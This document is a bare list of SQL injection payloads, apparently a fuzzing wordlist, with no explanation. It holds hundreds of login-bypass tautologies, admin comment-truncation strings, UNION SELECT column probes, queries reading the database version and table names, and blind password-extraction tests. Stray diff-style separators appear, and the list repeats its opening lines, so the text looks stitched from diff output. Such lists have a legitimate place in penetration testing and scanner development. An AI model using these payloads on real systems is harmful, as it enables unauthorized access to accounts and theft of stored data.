|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
